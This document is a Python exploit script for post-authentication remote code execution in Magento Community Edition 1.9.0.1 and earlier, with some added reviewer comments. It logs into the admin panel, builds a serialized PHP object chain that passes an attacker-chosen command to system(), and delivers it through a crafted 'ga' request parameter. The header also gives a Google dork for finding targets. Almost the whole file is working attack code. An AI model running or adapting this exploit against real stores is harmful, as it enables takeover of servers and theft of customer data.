 1#!/usr/bin/python
 2# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE 
 3# Google Dork: "Powered by Magento"
 4# Date: 08/18/2015
 5# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
 6# Vendor Homepage: http://magento.com/
 7# Software Link: https://www.magentocommerce.com/download
 8# Version: 1.9.0.1 and below
 9# Tested on: Ubuntu 15
10# CVE : none
11
12from hashlib import md5
13import sys
14import re
15import base64
16import mechanize
17
18
def usage():
    """Print the command-line synopsis and exit.

    NOTE(review): the message carries two ``%s`` placeholders but is never
    applied to ``sys.argv[0]``, so the placeholders are printed literally.
    ``sys.exit()`` with no argument exits with status 0.
    """
    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
    sys.exit()
22
23
# Exactly two positional arguments are required (target URL and the single
# string handed to the configured PHP function); anything else prints the
# synopsis and exits.
if len(sys.argv) != 3:
    usage()
26
# Command-line args
target = sys.argv[1]
arg = sys.argv[2]

# Config.
# Valid admin credentials are a precondition (the header describes this as a
# post-auth issue); they are submitted to the first form found at ``target``.
username = 'ypwq'
password = '123'
php_function = 'system'  # Note: we can only pass 1 argument to the function
# This value is concatenated into the MD5 that becomes the ``h`` parameter
# below; presumably the server recomputes it from its own local.xml, which is
# why the date has to match exactly.  Keeping local.xml unreadable is the
# corresponding hardening point.
install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec
# PHP serialize() format: each ``s:%d:"%s"`` pair is a length-prefixed string
# field, which is why ``len(php_function)`` / ``len(arg)`` are interpolated
# next to the values, and the ``\00*\00`` prefixes mark protected properties.
# The object graph (Zend_Log -> Zend_Log_Writer_Mail -> Zend_Config_Writer_Yaml
# -> Varien_Object) is the artefact to look for when reviewing requests.
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                     len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)  # do not consult robots.txt before requests

# Assumes ``target`` is the admin login page: the first form on it is filled
# with the configured credentials and POSTed.
request = br.open(target)

br.select_form(nr=0)
#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password

br.method = "POST"
request = br.submit()
content = request.read()

# The post-login page is expected to embed ``ajaxBlockUrl`` and ``FORM_KEY``
# in inline JavaScript.  ``.group(1)`` raises AttributeError if either regex
# does not match (e.g. the login was rejected) — there is no explicit check.
url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content.decode())
key = key.group(1)

# Load the dashboard orders tab; its response is expected to contain an
# ``src="...?ga="`` URL, whose prefix is used as the base of the final request.
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
tunnel = tunnel.group(1)

# ``h`` is MD5 over the base64-encoded payload concatenated with the install
# date; both operands are bytes here, so the concatenation is byte-level.
payload = base64.b64encode(payload.encode())
gh = md5(payload + install_date).hexdigest()

#print("T",tunnel)
#print("P",payload)
#print("GH", gh)
# The base64 blob travels in the ``ga`` query parameter and decodes to the
# serialized PHP object graph built above; a serialized object in this
# parameter is the observable signal for log review or request filtering.
exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh

try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    # NOTE(review): only an HTTPError carries a response body; a plain
    # URLError (e.g. connection failure) likely has no read() — confirm.
    print(e.read().decode())
83